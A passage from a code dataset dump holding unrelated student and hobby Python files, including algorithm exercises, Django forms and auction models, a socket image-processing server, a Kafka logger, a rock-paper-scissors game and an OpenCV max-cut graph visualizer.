conn.close()\r\n","repo_name":"RobatPlayer/python_note","sub_path":"03 面向对象/04 网络编程/作业/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74472544684","text":"import sys\n\ndef binary_search(start, end, find, arr):\n if start > end:\n return -1\n\n mid = (start + end) // 2\n\n if arr[mid] == find:\n return mid\n elif arr[mid] < find:\n return binary_search(mid + 1, end, find, arr)\n else:\n return binary_search(start, mid - 1, find, arr)\n\ndef search_front_back(index, arr, find):\n count = 0\n length = len(arr)\n back_index = index + 1\n while index > -1 and arr[index] == find:\n index -= 1\n count += 1\n\n while back_index < length and arr[back_index] == find:\n back_index += 1\n count += 1\n\n return count\n\n# 입력 처리\nn = int(sys.stdin.readline())\narr = list(map(int, sys.stdin.readline().split()))\n\nfind_n = int(sys.stdin.readline())\nfind_arr = list(map(int, sys.stdin.readline().split()))\n\nfor i in range(find_n):\n # 이진 탐색으로 해당 숫자 위치 찾고\n index = binary_search(0, n - 1, find_arr[i], arr)\n # 양 옆에 같은 숫자 탐색\n count = search_front_back(index, arr, find_arr[i])\n print(count, end=' ')\n","repo_name":"ddosang/AlgorithmStudy","sub_path":"+/4. 숫자 카운팅.py","file_name":"4. 숫자 카운팅.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35682670055","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.contrib.auth.models import User\n\n\nclass ClimbForm(forms.Form):\n climb = forms.CharField(\n label='Name/Location', max_length=240\n )\n difficulty = forms.CharField(\n label='Difficulty', max_length=10\n )\n\n CHOICES = ((0, 'Indoor'), (1, 'Outdoor'))\n outdoor_bool = forms.TypedChoiceField(\n label=\"Climbing type\", choices=CHOICES, widget=forms.RadioSelect, coerce=int\n )\n\n climb_notes = forms.CharField(\n label='Notes:', max_length=240, required=False\n )\n\nclass searchForm(forms.Form):\n climbType = forms.CharField(\n label=\"Find a climb\", max_length=50\n )\n\nclass CommentForm(forms.Form):\n comment = forms.CharField(\n label='Comment', max_length=240\n )\n\n#get new user\nclass RegistrationForm(UserCreationForm):\n email = forms.EmailField(\n label=\"Email\",\n required=True\n )\n\n class Meta:\n model = User\n fields = (\"username\", \"email\",\n \"password1\", \"password2\")\n\n def save(self, commit=True):\n user = super(RegistrationForm,self).save(commit=False)\n user.email = self.cleaned_data[\"email\"]\n if commit:\n user.save()\n return user\n","repo_name":"mmichelon/ClimbProject","sub_path":"climbproject/climbapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73852783083","text":"import sys\ninput = sys.stdin.readline\n\ndef func(cases : list, pays : list, choose : list):\n lastJob = -1\n if len(choose) > 0 :\n lastJob = choose[len(choose) - 1]\n day = lastJob + cases[lastJob][0] if lastJob != -1 else 0\n \n plus = False\n for i in range(day, len(cases)):\n if i + cases[i][0] <= len(cases):\n plus = True\n choose.append(i)\n func(cases, pays, choose)\n choose.pop()\n if day == len(cases) or not plus:\n pay = 0\n for i in choose:\n pay += cases[i][1]\n pays.append(pay)\n\nif __name__ == \"__main__\":\n num = int(input())\n cases = []\n pays = []\n for _ in range(num):\n day, pay = map(int, input().split())\n cases.append([day, pay])\n func(cases, pays, [])\n print(max(pays))","repo_name":"HyunwooKoh/CodingTest","sub_path":"baekjoon/silver3/sol_14501.py","file_name":"sol_14501.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11205485970","text":"from kafka import KafkaConsumer\nimport time\nimport base64\nimport cv2\n\nfrom utils import str_to_mat\nfrom notify import *\n\nlast_print = dict()\ndef write_image(img, name):\n img = str_to_mat(img.encode())\n cv2.imwrite(name, img)\n\n\ndef append_to_file(msg, img, conf):\n if msg not in last_print:\n last_print[msg] = 0\n t = time.time()\n img_name = \"log_img/\" + str(int(t * 10)) + '.jpg'\n write_image(img, img_name)\n file = open('log.out', 'a')\n file.write('%s,%s,%s,%s\\n'%(t, msg, img_name, conf))\n file.close()\n send_notification(msg)\n print(\"Done: \", t - last_print[msg])\n last_print[msg] = t\n\n\n# consumer = KafkaConsumer('notification', auto_offset_reset='earliest')\nconsumer = KafkaConsumer('notification')\n\nfor record in consumer:\n arr = record.value.decode().split(',')\n print(\"message: \" + arr[0])\n append_to_file(arr[0], arr[1], arr[2])\n","repo_name":"mostafa-elrosasy/surveillance-ml","sub_path":"Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74869874924","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.conf import settings\nfrom django.db.models.deletion import CASCADE, SET_NULL\nfrom django.db.models import Max, F, Q\nfrom django.db.models.fields.related import ForeignKey\nfrom django.conf import settings\nfrom django.utils import timezone\n\nclass Antique(models.Model):\n name = models.CharField(max_length=255)\n description = models.TextField(blank=True)\n \n\nclass Auction(models.Model):\n start_date = models.DateTimeField()\n end_date = models.DateTimeField()\n\n @property\n def remaining_time(self):\n now = timezone.now()\n rt = self.end_date - now\n return rt\n\n\nclass AuctionItem(models.Model):\n auction = models.ForeignKey(\n Auction,\n related_name='items',\n on_delete=models.CASCADE\n )\n antique = models.OneToOneField(Antique, on_delete=models.CASCADE)\n base_price = models.DecimalField(\n max_digits = 14, \n decimal_places=2, \n default=0.00\n )\n @property\n def current_price(self):\n current_highest = Bid.objects.aggregate(Max('price'))['price__max'] \n if current_highest is None: # no bid placed \n return self.base_price\n return current_highest\n\n\nclass Bid(models.Model):\n auction_item = models.ForeignKey(\n AuctionItem, \n on_delete=models.CASCADE,\n related_name=\"bids\"\n )\n price = models.DecimalField(\n max_digits = 14, \n decimal_places=2, \n default=0.00\n )\n bidder = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n date_placed = models.DateTimeField(auto_now_add=True)\n auto_bidding = models.BooleanField(default=False)\n\n @classmethod\n def get_user_highest(cls, user, item):\n highest = cls.objects.filter(\n bidder=user,\n auction_item=item\n ).aggregate(Max('price'))['price__max']\n\n return 0 if highest is None else highest\n\n\n\nclass AutoBid(models.Model):\n \"\"\"\n Represents the AutoBid Bot and Configuration \n Settings\n \"\"\"\n max_amount = models.DecimalField(\n max_digits = 14, \n decimal_places=2, \n default=0.00\n )\n\n used_amount = models.DecimalField(\n max_digits = 14, \n decimal_places=2, \n default=0.00\n )\n user = models.OneToOneField(User, on_delete=CASCADE)\n\n @property\n def remaining_amount(self):\n return self.max_amount - self.used_amount\n\n\n @staticmethod\n def outbid(bid):\n qs0 = Bid.objects.annotate(\n funds_remaining=F('bidder__autobid__max_amount') - F('bidder__autobid__used_amount')\n ).filter(\n Q(auction_item=bid.auction_item) &\n Q(auto_bidding=True) &\n Q(funds_remaining__gte=settings.AUTO_BIDDING_STEP) \n ).exclude( \n bidder=bid.bidder\n )\n if qs0.exists():\n qs0.update(\n price=F('price') + settings.AUTO_BIDDING_STEP\n ) \n qs1 = User.objects.filter(bid__in=qs0)\n\n AutoBid.objects.filter(user__in=qs1).update(\n used_amount=F('used_amount') + settings.AUTO_BIDDING_STEP\n )\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n # update deals with concurrency issues(see taken screenshot)\n\n # qs = bid.auction_items.bids.exclude(\n # bidder=bid.bidder\n # ).filter(\n # auto_bidding) \n \n # if qs.exists():\n # qs.update(\n # price=F('price') + 1\n # )\n","repo_name":"dilonne/auction_app","sub_path":"rest_api/auction/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"827495394","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 15 10:34:36 2018\n\n@author: Vipul\n\"\"\"\n\nimport os\nfor root, dirs, files in os.walk(\"./new-folder\", topdown = True):\n \n for filename in files:\n # print(os.path.join(root, filename))\n print(\"FILE: \" + filename)\n \n for dirname in dirs:\n print(\"DIRECTORY: \" + dirname)","repo_name":"qwertyvipul/python","sub_path":"noob/archive/scan-directory.py","file_name":"scan-directory.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"24636287436","text":"import socket\nimport json\nimport os\nfrom Filter import ImageFilter\n\nclass Processing_Server():\n def __init__(self, address: str, port: int, broker_port: int = 2000, max_attempts: int = 3) -> None:\n self.socket_server = socket.socket()\n self.hasBroker = False\n self.address = address\n self.port = port\n self.broker_port = broker_port\n self.max_attempts = max_attempts\n self.current_images = 0\n\n if(self.port == self.broker_port):\n raise ValueError(\"El puerto asignado al servidor de procesamiento no puede ser el mismo que el del servidor broker\")\n\n def listen(self) -> None:\n self.socket_server.bind((self.address, self.port))\n self.socket_server.listen()\n\n print(f\"Servidor de procesamiento @ {self.address}:{self.port} iniciado\")\n\n while True:\n conn, address = self.socket_server.accept()\n\n print(f\"Nueva conexión de {address}\")\n print(\"Manejando conexión\")\n\n continue_listening = False\n decoded_json = b\"\"\n extra_data = b\"\"\n extra_data_size = 0\n processed_images = 0\n\n while True:\n buffer = conn.recv(1024)\n recieved_bytes = len(buffer)\n\n if(not decoded_json):\n # El JSON nunca será mayor a 1024 bytes \n decoded_json = json.loads(buffer)\n\n continue_listening = True if decoded_json['message'] == 'CONTINUE' else False\n self.current_images = decoded_json['images']\n\n if(continue_listening):\n conn.send(b'1')\n else:\n break\n\n continue\n if(continue_listening):\n if(not extra_data_size):\n extra_data_size = int.from_bytes(buffer, 'little')\n conn.send(b'1')\n else:\n if(extra_data_size >= 0):\n extra_data += buffer\n extra_data_size -= recieved_bytes\n # El protocolo debe avisar cuando haya terminado de leer el archivo enviado\n # para que el broker mande la siguiente imagen\n if(extra_data_size <= 0):\n img_procesar = open(f'PROCESAR_{self.port}/IMG_{processed_images}.jpg', 'wb')\n img_procesar.write(extra_data)\n \n extra_data = b''\n extra_data_size = 0\n\n conn.send(b'1')\n processed_images += 1\n # El protocolo debe avisar cuando haya terminado de leer todas las imagenes\n # para que el broker espere la respuesta\n if(processed_images == self.current_images):\n conn.send(b'2')\n break\n\n if(isinstance(decoded_json, dict)):\n self.manejar_imagenes(conn)\n\n # Indicar al broker que ya se terminaron de procesar las imagenes y que se va a proceder a enviarlas\n conn.send(json.dumps({\"type\": \"PROCESSING_COMPLETE\", \"message\":\"CONTINUE\", \"IMAGES\": self.current_images}).encode('ASCII'))\n\n # Esperar a que el servidor broker indique que está listo para recibir las imagenes\n should_continue = conn.recv(1024)\n\n if(should_continue):\n for item in os.listdir(f'PROCESAR_{self.port}/Filtros/'):\n if(os.path.isfile(f\"PROCESAR_{self.port}/Filtros/{item}\")):\n filesize = os.path.getsize(f'PROCESAR_{self.port}/Filtros/{item}')\n conn.send(filesize.to_bytes(8, 'little'))\n\n should_send = conn.recv(1024)\n\n if(should_send):\n for byte in open(item, 'rb'):\n conn.send(byte)\n conn.close()\n \n def manejar_imagenes(self, socket: socket.socket):\n for i in range(self.current_images):\n ImageFilter(f'PROCESAR_{self.port}')\n\n def searchBroker(self) -> bool:\n print(f\"Buscando servidor broker @ localhost:{self.broker_port}\")\n print(f\"Se realizarán {self.max_attempts} intentos de conexión\")\n\n attempts = 0\n socket_client = socket.socket()\n\n while (attempts < self.max_attempts):\n try:\n socket_client.connect(('localhost', self.broker_port))\n request_json = {\"type\": \"NODE_CONNECT\", \"message\": self.port}\n\n socket_client.send(json.dumps(request_json).encode('ASCII'))\n\n response = socket_client.recv(1024)\n \n try:\n response = json.loads(response)\n\n if(response['type'] == 'NODE_CONNECTED'):\n socket_client.close()\n return True\n if(response['type'] == 'NODE_EXISTS'):\n print(f\"Ya existe un servidor de procesamiento con el puerto: {self.port}\")\n raise ValueError\n except:\n continue\n except:\n print(\"Fallo al conectarse con el servidor broker\")\n attempts += 1\n\n socket_client.close()\n return False\n\n def kill(self) -> None:\n self.socket_server.close()\n\nif __name__ == '__main__':\n s = Processing_Server('localhost', 9560)\n \n if(s.searchBroker()):\n print(\"Conectado al servidor broker\")\n s.listen()\n else:\n print(\"Fallaron los intentos de conexión al broker\")\n s.kill()\n","repo_name":"ZUCHOVICKI/ClusterASD","sub_path":"processing_server.py","file_name":"processing_server.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"29259049746","text":"from django import forms\nfrom .models import Assignment\nfrom .models import Assignment, AssignmentApplication\n\nclass AssignmentForm(forms.ModelForm):\n class Meta:\n model = Assignment\n fields = ['title', 'description', 'price', 'due_date', 'category']\n widgets = {\n 'due_date': forms.DateInput(attrs={'type': 'date'}),\n }\nclass AssignmentApplicationForm(forms.ModelForm):\n class Meta:\n model = AssignmentApplication\n fields = ['proposal', 'bid_amount']\n","repo_name":"Osten338/Marketplace-for-jurister","sub_path":"marketplace/jurrmarketplace/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2482733094","text":"from tkinter import *\nfrom tkinter.messagebox import showerror\n\n\ndef point_delete(window, listb_f_set, listb_s_set):\n listb_f_cursel = listb_f_set.curselection()\n listb_s_cursel = listb_s_set.curselection()\n\n try:\n if len(listb_f_cursel) == 0:\n listb_s_set.delete(listb_s_cursel)\n else:\n listb_f_set.delete(listb_f_cursel)\n except:\n showerror(\"Ошибка\", \"Выделите координаты точки для их удаления\")\n","repo_name":"Untouchabl3Pineapple/iu7-cg","sub_path":"lab_01/src/point_del.py","file_name":"point_del.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2009917243","text":"import random\nrock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\n#Write your code below this line 👇\n\nlijst = [rock, paper, scissors]\nrandom = random.randint(0, 2)\noptie = int(input(\"Maak een keus: \\n1) Rock\\n2) Paper\\n3) Scissors\\n\"))\nif optie > 3 or optie < 0:\n print(\"Geef een geldige invoer.\")\n exit()\ncomputer_keus = lijst[random]\ngebruiker_keus = lijst[optie -1]\n\n#winnen\nprint(f\"Jij selecteerde {gebruiker_keus}\")\nprint(f\"De computer koos {computer_keus}\")\nif gebruiker_keus == rock and computer_keus == scissors or gebruiker_keus == paper and computer_keus == rock or gebruiker_keus == scissors and computer_keus == paper:\n print(\"Jij wint!\")\n#verliezen\nelif gebruiker_keus == rock and computer_keus == paper or gebruiker_keus == paper and computer_keus == scissors or gebruiker_keus == scissors and computer_keus == rock:\n print(\"Jij verliest!\")\n#gelijkspel\nelse:\n print(\"Gelijkspel!\")\n\n\n","repo_name":"erikluckycraft/100-dagen-cursus","sub_path":"dag 4.py","file_name":"dag 4.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"nl","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"37789112289","text":"\n# -------------------------------------------------------------------\n# Andrew Morato\n# CS 631 Term Project\n# May 5, 2020\n# Undirected Weighted Graph Visualizer\n# -------------------------------------------------------------------\n\n'''\n\n Code to display an undirected, weighted graph using opencv.\n Accepts graphs of comprised of Node and Edge objects of the form:\n\n [s][v1][v2][v3][s]...[vn][e]\n\n where s is the source node, v1, v2, v3, ..., vn are groups of\n Node objects with edges connecting to the previous and next\n groups, t is the sink node, and [e] is the group of all Edge\n objects. The graph is displayed by drawing all vertices from\n each group in their own \"column\" and connecting edges between all\n drawn vertices. \n\n'''\n\n# Imports ---\n\nimport cv2\nimport numpy as np\nimport localsearch\n\n\n# Global Variables ---\n\n# Colors in BGR\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nBACKGROUND = (210, 210, 210)\nGRAY = (100, 100, 100)\nBLUE = (191, 114, 15)\nORANGE = (46, 125, 209)\nRED = (80, 53, 219)\nTEAL = (69, 133, 69)\n\n# Text and Image\nRAD = 20\nOFFSET = 5\nFONT = cv2.FONT_HERSHEY_SIMPLEX\nWINDOW = 200 #Window width for displaying information\n\n# Cost Tracking\nBEST_COST = 0\n\n# Mouse Position\nxPos, yPos = -1, -1\n\n# Interactive Visualizer ---\n\n# Displays an OpenCV image representation of the given graph. Creates\n# a blank image that will fit the graph and populates it with a\n# simple but adequate representation of the graph\n#\n# graph Graph to visualize. Has the format described in this\n# file's description\n#\n# returns None\ndef visualize(graph):\n\tglobal xPos, yPos\n\n\t# set the vertex locations in the image\n\ttriplets, dim = set_vertex_locations(graph[0], WINDOW)\n\n\t# create a blank image\n\tImg = np.zeros(dim, np.uint8)\n\tImg[:] = BACKGROUND\n\n\t# draw the graph\n\tedges = graph[1]\n\tGraph = draw_graph(Img.copy(), triplets, edges)\n\n\t# seperate edges that join [A, B]\n\tE = [e for e in edges if e.n.group != e.m.group]\n\n\t# populate display window\n\tGraph = disp_window(Graph, WINDOW, E, \"Initial Randomized Graph\")\n\n\t# display\n\tcv2.namedWindow('graph')\n\tcv2.setMouseCallback('graph', on_mouse_clicked)\n\tcv2.imshow('graph', Graph)\n\n\twhile True:\n\n\t\t# exit the interactive display\n\t\tk = cv2.waitKey(5) & 0xFF\n\t\tif k == 27 or k == ord('q'):\n\t\t\tbreak\n\n\t\t# mouse clicked, handle user input\n\t\tif xPos != -1:\n\n\t\t\t# determine where the click occured and handle each case\n\t\t\tcode = check_location(triplets, xPos, yPos)\n\n\t\t\t# Mouse click location is not in a Node\n\t\t\tif code == -4:\n\t\t\t\tmsg = \"Clicked empty space\"\n\n\t\t\t# Mouse click location is in the Source (unswitchable)\n\t\t\telif code == -3:\n\t\t\t\tmsg = \"Selected source vertex\"\n\n\t\t\t# Mouse click location is in the Sink (unswitchable)\n\t\t\telif code == -2:\n\t\t\t\tmsg = \"Selected sink vertex\"\n\n\t\t\t# Mouse click location is another unswitchable Node\n\t\t\telif code == -1:\n\t\t\t\tmsg = \"Selected unflippable vertex\"\n\n\t\t\t# Mouse click location is in a valid Node with that ID \n\t\t\telif code >= 0:\n\t\t\t\tmsg = \"Flipped vertex \" + str(code)\n\t\t\t\tflip(triplets, code)\n\t\t\t\tE = [e for e in edges if e.n.group != e.m.group]\n\n\t\t\t# redraw the display window and graph\n\t\t\tGraph = disp_window(Img.copy(), WINDOW, E, msg)\n\t\t\tGraph = draw_graph(Graph, triplets, edges)\n\n\t\t\t# display the graph\n\t\t\tcv2.imshow('graph', Graph)\n\n\t\t\txPos = -1\n\n\tcv2.destroyAllWindows()\n\n\n# Runs when the mouse was clicked. Sets global variables xPos and\n# yPos when the mouse's left button was clicked\n#\n# event Mouse event\n# x x position of the cursor\n# y y position of the cursor\n# f passed over\n# p passed over\n#\n# returns None\ndef on_mouse_clicked(event, x, y, f, p):\n\tglobal xPos, yPos\n\tif event == cv2.EVENT_LBUTTONDOWN:\n\t\txPos, yPos = x, y\n\n\n# Processing ---\n\n# Flips the Node with the given ID\n#\n# triplets triplet of Nodes to lookup the Node by ID\n# ID ID of the node to flip\n#\n# returns None\ndef flip(triplets, ID):\n\tnode = None\n\tfor triplet in triplets:\n\t\tif ID == triplet[2].ID:\n\t\t\tnode = triplet[2]\n\tnode.group = not node.group\n\tgroup = \"B\" if node.group == True else \"A\"\n\topposite = \"A\" if group == \"B\" else \"B\"\n\tmsg = \"[ Flipped vertex \" + str(ID) + \" from group \" + group\n\tmsg += \" to group \" + opposite + \" ]\"\n\tprint(msg)\n\n\n# Maps out vertex location for all vertices in each vertex group\n#\n# v Set of groups of vertices\n# win Window width for displaying information\n# height Vertical distance between vertices\n# width Horizontal distance between vertex groups\n# marg Margin - padding size\n#\n# returns Tuple of list of triplets for all vertices: (x, y, Node)\n# and the Img to draw the graph's shape\ndef set_vertex_locations(v, win, height=125, width=100, marg=65):\n\ttriplets = []\n\tleft = marg\n\n\t# calculate the midpoint of the Img\n\tbiggest_group = max(v, key=len)\n\tmiddle = int(((len(biggest_group) - 1) * height) / 2) + marg\n\n\tfor groups in v:\n\t\t# calculates the horizontal and vertical starting point\n\t\tnodes_below = int(len(groups) / 2)\n\t\tif len(groups) % 2 == 0:\n\t\t\tnodes_below = nodes_below - 0.5\n\t\tbottom = int(middle - (nodes_below * height))\n\n\t\t# adds locations\n\t\tfor vertex in groups:\n\t\t\ttriplets.append((left, bottom, vertex))\n\t\t\tbottom += height\n\t\tleft += width\n\t\t\t\n\tImg_shape = (middle*2, ((len(v)-1) * width) + (marg*2) + win, 3)\n\treturn (triplets, Img_shape)\n\n\n# Users can click a location on the Graph. Based on the location,\n# checks if the location specified by x and y is within a Node in\n# the Graph. Returns a code based on the location's characteristics.\n#\n# triplets A list of triplets of all Nodes and their x and y\n# positions where each entry has the the form (x, y, Node)\n# x The x position of the location to check\n# y The y position of the location to check\n#\n# returns Return code (int) for the following situations\n# -4 Location is not in a Node\n# -3 Location is in the Source (unflippable)\n# -2 Location is in the Sink (unflippable)\n# -1 Location is another unswitchable Node\n# 0+ Location is in a valid Node with that ID \ndef check_location(triplets, x, y):\n\tfor triplet in triplets:\n\t\tif pt_is_in_circle((triplet[0], triplet[1]), (x, y)):\n\n\t\t\t# Point is in the source\n\t\t\tif triplet[2].ID == 0:\n\t\t\t\treturn -3\n\n\t\t\t# Point is in the sink\n\t\t\telif triplet[2].ID == len(triplets)-1:\n\t\t\t\treturn -2\n\n\t\t\t# Point is in a Node that has no neighbors in the\n\t\t\t# opposing parition\n\t\t\telif not is_frontier_node(triplet[2]):\n\t\t\t\treturn -1\n\n\t\t\t# Point is in a valid, flippable Node\n\t\t\telse:\n\t\t\t\treturn triplet[2].ID\n\n\t# Point is not within any Node\n\treturn -4\n\n\n# Calculates if the point is within the circle\n#\n# c (x, y) tuple representing the center of the circle\n# p (x, y) tuple representing the point\n#\n# returns True if the point resides in this circle, else False\ndef pt_is_in_circle(c, p):\n\tdist = np.sqrt(np.square(p[0] - c[0]) + np.square(p[1] - c[1]))\n\treturn dist <= RAD\n\n\n# Returns True if the given Node is a frontier node, i.e. any of\n# its neighbors are in the group opposite to itself\n#\n# node The Node to check\n#\n# returns True if the given node is a frontier node, else False\ndef is_frontier_node(node):\n\tfor e in node.edges:\n\t\tif e.n.group != e.m.group:\n\t\t\treturn True\n\treturn False\n\n\n# Drawing ---\n\n# Populates the display window with relevant information\n#\n# Img OpenCV image to fill the display window\n# win Window width for displaying information\n# E Edges that join partition [A, B]\n# msg Message to print in the display window\n# marg Margin - vertical padding for the display window\n#\n# returns The modified OpenCV image\ndef disp_window(Img, win, E, msg, marg=90):\n\t\n\tglobal BEST_COST\n\n\t# Draw bounding line\n\th, w, _ = Img.shape\n\tpt1, pt2 = (w-win, h-marg), (w-win, marg)\n\tImg = cv2.line(Img, pt1, pt2, BLACK, thickness=2)\n\tbegin_text_width, midpoint = (w-win) + 20, int(h/2)\n\n\t# Current Cost\n\tcost = localsearch.cost(E)\n\ttext = \"cost of current cut: \" + str(cost)\n\tpt = (begin_text_width, midpoint)\n\tImg = cv2.putText(Img, text, pt, FONT, 0.4, BLACK)\n\n\t# Update best cost\n\tBEST_COST = cost if cost > BEST_COST else BEST_COST\n\n\t# Best Cost\n\ttext = \"cost of best cut: \" + str(BEST_COST)\n\tpt = (begin_text_width, midpoint - 50)\n\tImg = cv2.putText(Img, text, pt, FONT, 0.4, BLACK)\n\n\t# Print Message\n\tpt = (begin_text_width, midpoint + 50)\n\tImg = cv2.putText(Img, msg, pt, FONT, 0.4, BLACK)\n\n\treturn Img\n\n\n# Draws the labelled vertices and edges. Wrapper function for\n# draw_edges and draw_vertices. \n#\n# Img OpenCV image to draw the graph\n# triplets List of vertices belonging to the graph in triplet form:\n# (x-position, y-position, Node)\n# edges List of Edge objects in the graph\n#\n# returns The modified OpenCV image\ndef draw_graph(Img, triplets, edges):\n\tImg = draw_edges(Img, triplets, edges)\n\tImg = draw_vertices(Img, triplets)\n\treturn Img\n\n\n# Draws the vertices and labels them with their IDs on an OpenCV\n# image (called after draw_edges)\n#\n# Img OpenCV image to draw the vertices\n# triplets List of vertices belonging to the graph in triplet form:\n# (x-position, y-position, Node)\n#\n# returns The modified OpenCV image\ndef draw_vertices(Img, triplets):\n\tfor triplet in triplets:\n\n\t\t# Gets the coordinates of the Node\n\t\tv = (triplet[0], triplet[1])\n\n\t\t# Set the color of the Node\n\t\tcol = GRAY\n\t\tif triplet[2].group != None:\n\t\t\tcol = RED if triplet[2].group == False else BLUE\n\n\t\t# Draw the Node\n\t\tImg = cv2.circle(Img, v, RAD, color=col, thickness=-1)\n\t\tImg = cv2.circle(Img, v, RAD, color=BLACK, thickness=2)\n\n\t\t# Write the Node ID\n\t\tID = str(triplet[2].ID)\n\t\tif len(ID) == 2:\n\t\t\tv = (triplet[0] - (OFFSET + 7), triplet[1] + (OFFSET + 2))\n\t\telse:\n\t\t\tv = (triplet[0] - (OFFSET + 1), triplet[1] + OFFSET)\n\t\tImg = cv2.putText(Img, ID, v, FONT, 0.6, WHITE)\n\n\treturn Img\n\n\n# Draws the edges on an OpenCV image. Finds the position of each\n# edge's vertices and draws an edge between both points, labeled\n# with its weight\n#\n# Img OpenCV image to draw the edges\n# triplets List of vertices belonging to the graph in triplet form:\n# (x-position, y-position, Node)\n# edges List of Edge objects in the graph\n#\n# returns The modified OpenCV image\ndef draw_edges(Img, triplets, edges):\n\n\t# Gets the location of the vertex with the given ID\n\t#\n\t# ID ID of the vertex being searched for\n\t# triplets List of vertices belonging to the graph in triplet form:\n # (x-position, y-position, vertex ID)\n #\n # returns Location (x, y) of the vertex with the given ID\n\tdef getVertexLocation(ID, triplets):\n\t\tfor triplet in triplets:\n\t\t\tif ID == triplet[2].ID:\n\t\t\t\treturn (triplet[0], triplet[1])\n\t\tprint(\"ERROR: No ID found\")\n\n\tfor edge in edges:\n\t\tn_loc = getVertexLocation(edge.n.ID, triplets)\n\t\tm_loc = getVertexLocation(edge.m.ID, triplets)\n\n\t\t# set color\n\t\tcol = BLACK\n\t\tif edge.n.group != edge.m.group:\n\t\t\tcol = TEAL\n\n\t\t# draw line\n\t\tImg = cv2.line(Img, n_loc, m_loc, color=col, thickness=2)\n\n\t\t# find a point between both nodes and label weight\n\t\tm = (int((n_loc[0]+m_loc[0])/2), int((n_loc[1]+m_loc[1])/2))\n\t\tm = (int((n_loc[0]+m[0])/2), int((n_loc[1]+m[1])/2 - 7))\n\t\tw = str(edge.weight)\n\t\tImg = cv2.putText(Img, w, m, FONT, 0.45, ORANGE, thickness=2)\n\n\treturn Img\n\n\n# Display Mode ---\n\n# As opposed to interactive mode, this mode takes no user input other\n# than 'n' for the next flip\n\n# Displays the entrie graph and output window\n#\n# nodes A list of Nodes of the graph\n# edges A list of Edges of the graph\n# msg The message to display\n# cost The cost of the current cut\n#\n# returns None\ndef display_graph(nodes, edges, msg, cost):\n\n\t# set the vertex locations in the image\n\ttriplets, dim = set_vertex_locations(nodes, WINDOW)\n\n\t# create a blank image\n\tImg = np.zeros(dim, np.uint8)\n\tImg[:] = BACKGROUND\n\n\t# draw the graph\n\tG = draw_graph(Img.copy(), triplets, edges)\n\n\t# seperate edges that join [A, B]\n\tbridge_edges = [e for e in edges if e.n.group != e.m.group]\n\n\t# populate display window\n\tG = display_window(G, WINDOW, bridge_edges, msg, cost)\n\n\t# display\n\tcv2.imshow('graph', G)\n\n\twhile True:\n\t\tk = cv2.waitKey(5) & 0xFF\n\t\tif k == 27 or k == ord('n'):\n\t\t\tbreak\n\n\n# Populates the display window with relevant information\n#\n# Img OpenCV image to fill the display window\n# win Window width for displaying information\n# bridging_edges Edges that join partition [A, B]\n# msg Message to print in the display window\n# cost Cost of the current cut\n# marg Margin - vertical padding for the display window\n#\n# returns The modified OpenCV image\ndef display_window(Img, win, bridge_edges, msg, cost, marg=90):\n\t\n\t# Draw bounding line\n\th, w, _ = Img.shape\n\tpt1, pt2 = (w-win, h-marg), (w-win, marg)\n\tImg = cv2.line(Img, pt1, pt2, BLACK, thickness=2)\n\tbegin_text_width, midpoint = (w-win) + 20, int(h/2)\n\n\t# Current Cost\n\ttext = \"cost of cut: \" + str(cost)\n\tpt = (begin_text_width, midpoint - 25)\n\tImg = cv2.putText(Img, text, pt, FONT, 0.4, BLACK)\n\n\t# Print Message\n\tpt = (begin_text_width, midpoint + 25)\n\tImg = cv2.putText(Img, msg, pt, FONT, 0.4, BLACK)\n\n\treturn Img\n","repo_name":"andy9kv/Projects","sub_path":"Project_Files/Maxcut_Analysis/code/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":13157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20512490537","text":"# [Count-Number-Up-To-N, Prime-Factor, Classic]\n# https://leetcode.com/problems/count-primes/\n# 204. Count Primes\n\n# https://en.wikipedia.org/wiki/Sieve_of_Eratosthenes\n# https://www.youtube.com/watch?v=Kwo2jkHOyPY\n\n# Count the number of prime numbers less than a non-negative number, n.\n#\n# Example:\n#\n# Input: 10\n# Output: 4\n# Explanation: There are 4 prime numbers less than 10, they are 2, 